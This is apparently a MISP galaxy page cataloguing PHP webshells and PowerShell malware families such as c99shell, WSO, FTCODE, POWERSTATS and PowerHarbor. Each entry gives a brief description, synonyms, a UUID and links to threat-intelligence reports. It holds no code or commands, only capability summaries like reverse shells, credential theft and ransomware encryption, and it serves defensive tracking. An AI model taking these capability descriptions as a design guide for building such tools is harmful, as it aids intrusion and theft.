Metadata key | Value |
---|---|
type | [] |
Ani-Shell
Ani-Shell is a simple PHP shell with some unique features such as a Mass Mailer, a simple Web-Server Fuzzer, Dosser, Back Connect, Bind Shell, Auto Rooter, etc.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Ani-Shell.
Known Synonyms |
---|
anishell |
Internal MISP references
UUID 7ef3c0fd-8736-47b1-8ced-ca7bf6d27471
which can be used as unique global reference for Ani-Shell
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ANTAK
Antak is a webshell written in ASP.Net which utilizes PowerShell.
Internal MISP references
UUID 88a71ca8-d99f-416a-ad29-5af12212008c
which can be used as unique global reference for ANTAK
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/php.antak - webarchive
- https://github.com/samratashok/nishang/blob/master/Antak-WebShell/antak.aspx - webarchive
- https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf - webarchive
- http://www.labofapenetrationtester.com/2014/06/introducing-antak.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ASPXSpy
Internal MISP references
UUID 4d1c01be-76ad-42dd-b094-7a8dbaf02159
which can be used as unique global reference for ASPXSpy
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/php.aspxspy - webarchive
- https://attack.mitre.org/groups/G0096 - webarchive
- https://asec.ahnlab.com/en/47455/ - webarchive
- https://securelist.com/defttorero-tactics-techniques-and-procedures/107610/ - webarchive
- https://www.recordedfuture.com/full-spectrum-detections-five-popular-web-shells - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Behinder
A webshell for multiple web languages (asp/aspx, jsp/jspx, php), openly distributed through Github.
Internal MISP references
UUID 5e5cd3a6-0348-4c6b-94b1-13ca0d845547
which can be used as unique global reference for Behinder
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/php.behinder - webarchive
- https://www.elastic.co/security-labs/ref2924-howto-maintain-persistence-as-an-advanced-threat - webarchive
- https://github.com/hktalent/MyDocs/blob/main/BehinderShell.md - webarchive
- https://blog.gigamon.com/2022/09/28/investigating-web-shells/ - webarchive
- https://cyberandramen.net/2022/02/18/a-tale-of-two-shells/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
c99shell
C99shell is a PHP backdoor that provides a lot of functionality, for example:
- run shell commands;
- download/upload files from and to the server (FTP functionality);
- full access to all files on the hard disk;
- self-delete functionality.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular c99shell.
Known Synonyms |
---|
c99 |
Internal MISP references
UUID cd1b8ec2-dbbd-4e73-b9a7-1bd1287a68f2
which can be used as unique global reference for c99shell
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DEWMODE
FireEye discovered the DEWMODE webshell starting mid-December 2020, after exploitation of zero-day vulnerabilities in Accellion's File Transfer Appliance. It is a PHP webshell that allows threat actors to view and download files on the victim machine. It also contains a cleanup function to remove itself and clean the Apache log.
Internal MISP references
UUID a782aac8-168d-4691-a182-237d7d473e21
which can be used as unique global reference for DEWMODE
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/php.dewmode - webarchive
- https://www.fireeye.com/blog/threat-research/2021/02/accellion-fta-exploited-for-data-theft-and-extortion.html - webarchive
- https://go.recordedfuture.com/hubfs/reports/mtp-2021-0312.pdf - webarchive
- https://www.accellion.com/sites/default/files/trust-center/accellion-fta-attack-mandiant-report-full.pdf - webarchive
- https://us-cert.cisa.gov/ncas/analysis-reports/ar21-055a - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Ensikology
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Ensikology.
Known Synonyms |
---|
Ensiko |
Internal MISP references
UUID dfd8deac-ce86-4a22-b462-041c19d62506
which can be used as unique global reference for Ensikology
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
p0wnyshell
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular p0wnyshell.
Known Synonyms |
---|
Ponyshell |
Pownyshell |
Internal MISP references
UUID a6d13ffe-1b1a-46fe-afd9-989e8dec3773
which can be used as unique global reference for p0wnyshell
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Parrot TDS WebShell
The use of a classical web shell in combination with Parrot TDS was observed by DECODED Avast.io.
Internal MISP references
UUID c9e7c5a6-9082-47ec-89eb-477980e73dcb
which can be used as unique global reference for Parrot TDS WebShell
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
PAS
Internal MISP references
UUID e6a40fa2-f79f-40e9-89d3-a56984bc51f7
which can be used as unique global reference for PAS
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/php.pas - webarchive
- https://securelist.com/apt-trends-report-q1-2021/101967/ - webarchive
- https://blog.erratasec.com/2016/12/some-notes-on-iocs.html - webarchive
- https://www.us-cert.gov/security-publications/GRIZZLY-STEPPE-Russian-Malicious-Cyber-Activity - webarchive
- https://www.domaintools.com/resources/blog/centreon-to-exim-and-back-on-the-trail-of-sandworm - webarchive
- https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Prometheus Backdoor
Backdoor written in PHP.
Internal MISP references
UUID b4007b02-106d-420f-af1c-76c035843fd2
which can be used as unique global reference for Prometheus Backdoor
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
RedHat Hacker WebShell
Internal MISP references
UUID e94a5b44-f2c2-41dc-8abb-6de69eb38241
which can be used as unique global reference for RedHat Hacker WebShell
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
WSO
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular WSO.
Known Synonyms |
---|
Webshell by Orb |
Internal MISP references
UUID 7f3794fc-662e-4dde-b793-49bcaccc96f7
which can be used as unique global reference for WSO
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/php.wso - webarchive
- https://securelist.com/energetic-bear-crouching-yeti/85345/ - webarchive
- https://www.aquasec.com/blog/loony-tunables-vulnerability-exploited-by-kinsing/ - webarchive
- https://www.mandiant.com/resources/cloud-metadata-abuse-unc2903 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Silence DDoS
Internal MISP references
UUID b5cc7a39-305b-487e-b15a-02dcebefce90
which can be used as unique global reference for Silence DDoS
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BlackSun
Ransomware.
Internal MISP references
UUID 1fcc4425-6e14-47e6-8434-745cf1bc9982
which can be used as unique global reference for BlackSun
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BONDUPDATER
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular BONDUPDATER.
Known Synonyms |
---|
Glimpse |
Poison Frog |
Internal MISP references
UUID 99600ba5-30a0-4ac8-8583-6288760b77c3
which can be used as unique global reference for BONDUPDATER
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/ps1.bondupdater - webarchive
- https://researchcenter.paloaltonetworks.com/2018/09/unit42-oilrig-uses-updated-bondupdater-target-middle-eastern-government/ - webarchive
- https://www.boozallen.com/s/insight/blog/dark-labs-discovers-apt34-malware-variants.html?cid=spo-csatb-2 - webarchive
- https://www.zdnet.com/article/source-code-of-iranian-cyber-espionage-tools-leaked-on-telegram/ - webarchive
- https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae - webarchive
- https://ironnet.com/blog/chirp-of-the-poisonfrog/ - webarchive
- https://blog.0day.rocks/hacking-back-and-influence-operations-85cd52c1e933 - webarchive
- https://unit42.paloaltonetworks.com/behind-the-scenes-with-oilrig/ - webarchive
- https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf - webarchive
- https://www.netscout.com/blog/asert/tunneling-under-sands - webarchive
- https://unit42.paloaltonetworks.com/dns-tunneling-in-the-wild-overview-of-oilrigs-dns-tunneling/ - webarchive
- https://www.secureworks.com/research/threat-profiles/cobalt-gypsy - webarchive
- https://nsfocusglobal.com/apt34-event-analysis-report/ - webarchive
- https://marcoramilli.com/2019/05/02/apt34-glimpse-project/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
CASHY200
Internal MISP references
UUID 7373c789-2dc2-4867-9c60-fa68f8d971a2
which can be used as unique global reference for CASHY200
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
EugenLoader
A loader written in PowerShell, usually delivered packaged in MSI/MSIX files.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular EugenLoader.
Known Synonyms |
---|
FakeBat |
NUMOZYLOD |
PaykLoader |
Internal MISP references
UUID cf9c14cf-6246-4858-8bcc-5a943c8df715
which can be used as unique global reference for EugenLoader
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/ps1.eugenloader - webarchive
- https://www.googlecloudcommunity.com/gc/Community-Blog/Finding-Malware-Unveiling-NUMOZYLOD-with-Google-Security/ba-p/789551 - webarchive
- https://www.rewterz.com/rewterz-news/rewterz-threat-alert-widely-abused-msix-app-installer-disabled-by-microsoft-active-iocs - webarchive
- https://intel471.com/blog/malvertising-surges-to-distribute-malware - webarchive
- https://esentire-dot-com-assets.s3.amazonaws.com/assets/resourcefiles/eSentire-Unraveling_BatLoader_and_FakeBat.pdf - webarchive
- https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
FlowerPower
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular FlowerPower.
Known Synonyms |
---|
BoBoStealer |
Internal MISP references
UUID 6f0f034a-13f1-432d-bc70-f78d7f27f46f
which can be used as unique global reference for FlowerPower
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/ps1.flowerpower - webarchive
- https://i.blackhat.com/asia-21/Friday-Handouts/as-21-Kuo-We-Are-About-To-Land-How-CloudDragon-Turns-A-Nightmare-Into-Reality.pdf - webarchive
- https://www.youtube.com/watch?v=rfzmHjZX70s - webarchive
- https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf - webarchive
- https://vblocalhost.com/uploads/VB2020-46.pdf - webarchive
- https://vb2020.vblocalhost.com/uploads/VB2020-46.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
FRat Loader
Loader used to deliver FRat (see family windows.frat)
Internal MISP references
UUID 385a3dca-263d-46be-b84d-5dc09ee466d9
which can be used as unique global reference for FRat Loader
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
FTCODE
The malware FTCODE is a ransomware that encrypts files and changes their extension to .FTCODE. It then demands a ransom in exchange for the decryption key, which is required to recover the files. It is infamous for campaigns against Italy in which it impersonated a well-known telecom provider demanding payment of outstanding bills.
Internal MISP references
UUID f727a05e-c1cd-4e95-b0bf-2a4bb64aa850
which can be used as unique global reference for FTCODE
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/ps1.ftcode - webarchive
- https://nakedsecurity.sophos.com/2013/03/05/russian-ransomware-windows-powershell/ - webarchive
- https://www.certego.net/en/news/malware-tales-ftcode/ - webarchive
- https://www.kpn.com/security-blogs/FTCODE-taking-over-a-portion-of-the-botnet.htm - webarchive
- https://www.certego.net/en/news/ftdecryptor-a-simple-password-based-ftcode-decryptor/ - webarchive
- https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/Unknown/2020-06-22/Analysis.md - webarchive
- https://dissectingmalwa.re/nicht-so-goot-breaking-down-gootkit-and-jasper-ftcode.html - webarchive
- https://www.zscaler.com/blogs/research/ftcode-ransomware--new-version-includes-stealing-capabilities - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
GhostMiner
Internal MISP references
UUID 0db05333-2214-49c3-b469-927788932aaa
which can be used as unique global reference for GhostMiner
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/ps1.ghostminer - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/fileless-cryptocurrency-miner-ghostminer-weaponizes-wmi-objects-kills-other-cryptocurrency-mining-payloads/ - webarchive
- https://research.checkpoint.com/malware-against-the-c-monoculture/ - webarchive
- https://blog.minerva-labs.com/ghostminer-cryptomining-malware-goes-fileless - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
HTTP-Shell
The author describes this open source shell as follows. HTTP-Shell is a multiplatform reverse shell. This tool helps you to obtain a shell-like interface on a reverse connection over HTTP. Unlike other reverse shells, the main goal of the tool is to use it in conjunction with Microsoft Dev Tunnels, in order to get a connection as close as possible to a legitimate one.
This shell is not fully interactive, but displays any errors on screen (both Windows and Linux), is capable of uploading and downloading files, has command history, terminal cleanup (even with CTRL+L), automatic reconnection, movement between directories and supports sudo (or sudo su) on Linux-based OSes.
Internal MISP references
UUID 50b94b67-dc2a-4953-a354-edf2cc4e17d3
which can be used as unique global reference for HTTP-Shell
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
JasperLoader
Internal MISP references
UUID 286a14a1-7113-4bed-97ce-8db41b312a51
which can be used as unique global reference for JasperLoader
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/ps1.jasperloader - webarchive
- https://blog.threatstop.com/upgraded-jasperloader-infecting-machines - webarchive
- https://blog.talosintelligence.com/2019/04/jasperloader-targets-italy.html - webarchive
- https://dissectingmalwa.re/nicht-so-goot-breaking-down-gootkit-and-jasper-ftcode.html - webarchive
- https://blog.talosintelligence.com/2019/05/sorpresa-jasperloader.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Lazyscripter
Internal MISP references
UUID 74e5711e-b777-4f09-a4bc-db58d5e23e29
which can be used as unique global reference for Lazyscripter
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
LightBot
According to Bleeping Computer and Vitali Kremez, LightBot is a compact reconnaissance tool suspected to be used to identify high-value targets for potential follow-up ransomware attacks.
Internal MISP references
UUID 319c4b4f-2901-412c-8fa5-70be75ba51cb
which can be used as unique global reference for LightBot
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Octopus (Powershell)
The author describes Octopus as an "open source, pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S."
It is different from the malware win.octopus written in Delphi and attributed to DustSquad by Kaspersky Labs.
Internal MISP references
UUID c3ca7a89-a885-444a-8642-31019b34b027
which can be used as unique global reference for Octopus (Powershell)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/ps1.octopus - webarchive
- https://isc.sans.edu/diary/rss/28628 - webarchive
- https://isc.sans.edu/diary/26918 - webarchive
- https://resources.malwarebytes.com/files/2021/02/LazyScripter.pdf - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2021-0107.pdf - webarchive
- https://github.com/mhaskar/Octopus - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
OilRig
Internal MISP references
UUID 4a3b9669-8f91-47df-a8bf-a9876ab8edf3
which can be used as unique global reference for OilRig
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/ps1.oilrig - webarchive
- https://www.vkremez.com/2018/03/investigating-iranian-threat-group.html - webarchive
- https://threatpost.com/oilrig-apt-unique-backdoor/157646/ - webarchive
- https://twitter.com/MJDutch/status/1074820959784321026?s=19 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
PhonyC2
Internal MISP references
UUID c630e510-a0ad-405a-9aeb-9d8057b6a868
which can be used as unique global reference for PhonyC2
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/ps1.phonyc2 - webarchive
- https://www.deepinstinct.com/blog/phonyc2-revealing-a-new-malicious-command-control-framework-by-muddywater - webarchive
- https://www.deepinstinct.com/blog/muddyc2go-latest-c2-framework-used-by-iranian-apt-muddywater-spotted-in-israel - webarchive
- https://circleid.com/posts/20230824-signs-of-muddywater-developments-found-in-the-dns - webarchive
- https://www.deepinstinct.com/blog/muddywater-en-able-spear-phishing-with-new-ttps - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
POSHSPY
Internal MISP references
UUID 4df1b257-c242-46b0-b120-591430066b6f
which can be used as unique global reference for POSHSPY
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
PowerBrace
Internal MISP references
UUID 7b334343-0045-4d65-b28a-ebf912c7aafc
which can be used as unique global reference for PowerBrace
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
PowerHarbor
PowerHarbor is a modular PowerShell-based malware that consists of various modules. The primary module maintains constant communication with the C2 server, executing and deleting additional modules received from it. Currently, the communication with the C2 server is encrypted using RSA encryption and hardcoded key data. Moreover, the main module incorporates virtual machine (VM) detection capabilities. The StealData module employs the Invoke-Stealer function as its core, enabling the theft of system information, browser-stored credentials, cryptocurrency wallet details, and credentials for various applications like Telegram, FileZilla, and WinSCP.
Internal MISP references
UUID 73b40a4c-9163-4a07-bf1b-e4a4344ac63a
which can be used as unique global reference for PowerHarbor
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
PowerPepper
Internal MISP references
UUID 6544c75b-809f-4d31-a235-8906d4004828
which can be used as unique global reference for PowerPepper
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
POWERPIPE
Internal MISP references
UUID 60d7f668-66b6-401b-976f-918470a23c3d
which can be used as unique global reference for POWERPIPE
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powerpipe - webarchive
- https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html - webarchive
- https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
POWERPLANT
POWERPLANT is a backdoor written in PowerShell and used by FIN7. According to Mandiant, it was revealed to be a "vast backdoor framework with a breadth of capabilities, depending on which modules are delivered from the C2 server."
Internal MISP references
UUID 697626d3-04a1-4426-aeae-d7054c6e78fb
which can be used as unique global reference for POWERPLANT
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
powershell_web_backdoor
Internal MISP references
UUID 4310dcab-0820-4bc1-8a0b-9691c20f5b49
which can be used as unique global reference for powershell_web_backdoor
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
PowerShortShell
Internal MISP references
UUID f2198153-2d8b-49ed-b8a8-0952c289b8c0
which can be used as unique global reference for PowerShortShell
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
PowerShower
Internal MISP references
UUID 0959a02e-6eba-43dc-bbbf-b2c7488e9371
which can be used as unique global reference for PowerShower
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powershower - webarchive
- https://unit42.paloaltonetworks.com/atoms/clean-ursa - webarchive
- https://securelist.com/recent-cloud-atlas-activity/92016/ - webarchive
- https://unit42.paloaltonetworks.com/atoms/clean-ursa/ - webarchive
- https://attack.mitre.org/groups/G0100/ - webarchive
- https://unit42.paloaltonetworks.com/unit42-inception-attackers-target-europe-year-old-office-vulnerability - webarchive
- https://unit42.paloaltonetworks.com/unit42-inception-attackers-target-europe-year-old-office-vulnerability/ - webarchive
- https://securelist.com/recent-cloud-atlas-activity/92016 - webarchive
- https://attack.mitre.org/groups/G0100 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
POWERSOURCE
POWERSOURCE is a heavily obfuscated and modified version of the publicly available tool DNS_TXT_Pwnage. The backdoor uses DNS TXT requests for command and control and is installed in the registry or Alternate Data Streams.
Internal MISP references
UUID a4584181-f739-43d1-ade9-8a7aa21278a0
which can be used as unique global reference for POWERSOURCE
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powersource - webarchive
- https://cocomelonc.github.io/malware/2023/07/26/malware-tricks-35.html - webarchive
- https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf - webarchive
- https://www.fireeye.com/blog/threat-research/2017/03/fin7_spear_phishing.html - webarchive
- https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
PowerSpritz
Internal MISP references
UUID c07f6484-0669-44b7-90e6-f642e316d277
which can be used as unique global reference for PowerSpritz
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
POWERSTAR
Internal MISP references
UUID 60e11a7b-8452-4177-b709-99ef0976c296
which can be used as unique global reference for POWERSTAR
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
POWERSTATS
POWERSTATS is a backdoor written in PowerShell. It has the ability to disable Microsoft Office Protected View, fingerprint the victim and receive commands.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular POWERSTATS.
Known Synonyms |
---|
Valyria |
Internal MISP references
UUID b81d91b5-23a4-4f86-aea9-3f212169fce9
which can be used as unique global reference for POWERSTATS
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powerstats - webarchive
- https://blog.prevailion.com/2020/01/summer-mirage.html - webarchive
- https://unit42.paloaltonetworks.com/atoms/boggyserpens/ - webarchive
- https://unit42.paloaltonetworks.com/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/ - webarchive
- https://www.inforisktoday.com/muddywater-targets-critical-infrastructure-in-asia-europe-a-18611 - webarchive
- https://www.fireeye.com/blog/threat-research/2018/03/iranian-threat-group-updates-ttps-in-spear-phishing-campaign.html - webarchive
- https://sec0wn.blogspot.com/2018/02/burping-on-muddywater.html - webarchive
- https://sec0wn.blogspot.com/2018/05/clearing-muddywater-analysis-of-new.html - webarchive
- https://www.clearskysec.com/wp-content/uploads/2019/06/Clearsky-Iranian-APT-group-%E2%80%98MuddyWater%E2%80%99-Adds-Exploits-to-Their-Arsenal.pdf - webarchive
- https://www.clearskysec.com/muddywater-operations-in-lebanon-and-oman/ - webarchive
- https://www.secureworks.com/research/threat-profiles/cobalt-ulster - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/campaign-possibly-connected-muddywater-surfaces-middle-east-central-asia/ - webarchive
- https://marcoramilli.com/2020/01/15/iranian-threat-actors-preliminary-analysis/ - webarchive
- https://research.checkpoint.com/2019/the-muddy-waters-of-apt-attacks/ - webarchive
- https://sec0wn.blogspot.com/2017/10/continued-activity-targeting-middle-east.html - webarchive
- https://www.group-ib.com/blog/muddywater/ - webarchive
- https://securelist.com/apt-trends-report-q2-2019/91897/ - webarchive
- https://shells.systems/reviving-leaked-muddyc3-used-by-muddywater-apt/ - webarchive
- https://reaqta.com/2017/11/muddywater-apt-targeting-middle-east/ - webarchive
- https://www.cisa.gov/uscert/ncas/alerts/aa22-055a - webarchive
- https://www.cisa.gov/uscert/sites/default/files/publications/AA22-055A_Iranian_Government-Sponsored_Actors_Conduct_Cyber_Operations.pdf - webarchive
- https://www.clearskysec.com/muddywater-targets-kurdish-groups-turkish-orgs/ - webarchive
- http://www.secureworks.com/research/threat-profiles/cobalt-ulster - webarchive
- https://www.deepinstinct.com/blog/phonyc2-revealing-a-new-malicious-command-control-framework-by-muddywater - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/muddywater-resurfaces-uses-multi-stage-backdoor-powerstats-v3-and-new-post-exploitation-tools/ - webarchive
- https://thehackernews.com/2022/02/irans-muddywater-hacker-group-using-new.html - webarchive
- https://web.archive.org/web/20180807105755/https://www.sekoia.fr/blog/falling-on-muddywater/ - webarchive
- https://mp.weixin.qq.com/s/NN_iRvwA6yOHFS9Z3A0RBA - webarchive
- https://blog.malwarebytes.com/threat-analysis/2017/09/elaborate-scripting-fu-used-in-espionage-attack-against-saudi-arabia-government_entity/ - webarchive
- https://sec0wn.blogspot.com/2018/03/a-quick-dip-into-muddywaters-recent.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
POWERTON
Internal MISP references
UUID 08d5b8a4-e752-48f3-ac6d-944807146ce7
which can be used as unique global reference for POWERTON
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powerton - webarchive
- https://www.microsoft.com/security/blog/2020/06/18/inside-microsoft-threat-protection-mapping-attack-chains-from-cloud-to-endpoint/ - webarchive
- https://norfolkinfosec.com/apt33-powershell-malware/ - webarchive
- https://blog.telsy.com/meeting-powerband-the-apt33-net-powerton-variant/ - webarchive
- https://www.secureworks.com/research/threat-profiles/cobalt-trinity - webarchive
- https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html - webarchive
- https://www.fireeye.com/blog/threat-research/2020/07/scandalous-external-detection-using-network-scan-data-and-automation.html - webarchive
- https://www.symantec.com/security-center/writeup/2019-062513-4935-99 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
POWERTRASH
This malware, written in PowerShell, is an in-memory dropper used by FIN7 to execute its embedded payload. According to Mandiant's blog article: "POWERTRASH is a uniquely obfuscated iteration of a shellcode invoker included in the PowerSploit framework available on GitHub."
Internal MISP references
UUID ff20d720-285e-4168-ac8c-86a7f9ac18d4
which can be used as unique global reference for POWERTRASH
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powertrash - webarchive
- https://www.rewterz.com/rewterz-news/rewterz-threat-alert-widely-abused-msix-app-installer-disabled-by-microsoft-active-iocs - webarchive
- https://www.mandiant.com/resources/blog/evolution-of-fin7 - webarchive
- https://www.mandiant.com/resources/evolution-of-fin7 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
PowerWare
Internal MISP references
UUID 5c5beab9-614c-4c86-b369-086234ddb43c
which can be used as unique global reference for PowerWare
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
PowerZure
PowerZure is a PowerShell project created to assess and exploit resources within Microsoft’s cloud platform, Azure. PowerZure was created out of the need for a framework that can both perform reconnaissance and exploitation of Azure, AzureAD, and the associated resources.
Internal MISP references
UUID f5fa77e9-9851-48a6-864d-e0448de062d4
which can be used as unique global reference for PowerZure
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
PowerMagic
Internal MISP references
UUID 7ee51054-1d3b-45ec-a7fd-1e212c891b99
which can be used as unique global reference for PowerMagic
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/ps1.power_magic - webarchive
- https://securelist.com/bad-magic-apt/109087/ - webarchive
- https://securelist.com/cloudwizard-apt/109722/ - webarchive
- https://www.malwarebytes.com/blog/threat-intelligence/2023/05/redstinger - webarchive
- https://securelist.com/bad-magic-apt/109087/?s=31 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
PowerRAT
Internal MISP references
UUID 970bdeaf-bc34-458a-ae67-8c3578e8663d
which can be used as unique global reference for PowerRAT
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
PowGoop
DLL loader that decrypts and runs a PowerShell-based downloader.
Internal MISP references
UUID d8429f6d-dc4b-4aae-930d-234156dbf354
which can be used as unique global reference for PowGoop
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powgoop - webarchive
- https://www.cisa.gov/uscert/sites/default/files/publications/AA22-055A_Iranian_Government-Sponsored_Actors_Conduct_Cyber_Operations.pdf - webarchive
- https://www.security.ntt/blog/analysis-of-an-iranian-apts-e400-powgoop-variant - webarchive
- https://thehackernews.com/2022/02/irans-muddywater-hacker-group-using-new.html - webarchive
- https://www.inforisktoday.com/muddywater-targets-critical-infrastructure-in-asia-europe-a-18611 - webarchive
- https://www.cybercom.mil/Media/News/Article/2897570/iranian-intel-cyber-suite-of-malware-uses-open-source-tools/ - webarchive
- https://www.sentinelone.com/labs/wading-through-muddy-waters-recent-activity-of-an-iranian-state-sponsored-threat-actor/ - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/seedworm-apt-iran-middle-east - webarchive
- https://www.clearskysec.com/wp-content/uploads/2020/10/Operation-Quicksand.pdf - webarchive
- https://www.cyberscoop.com/muddywater-iran-symantec-middle-east/ - webarchive
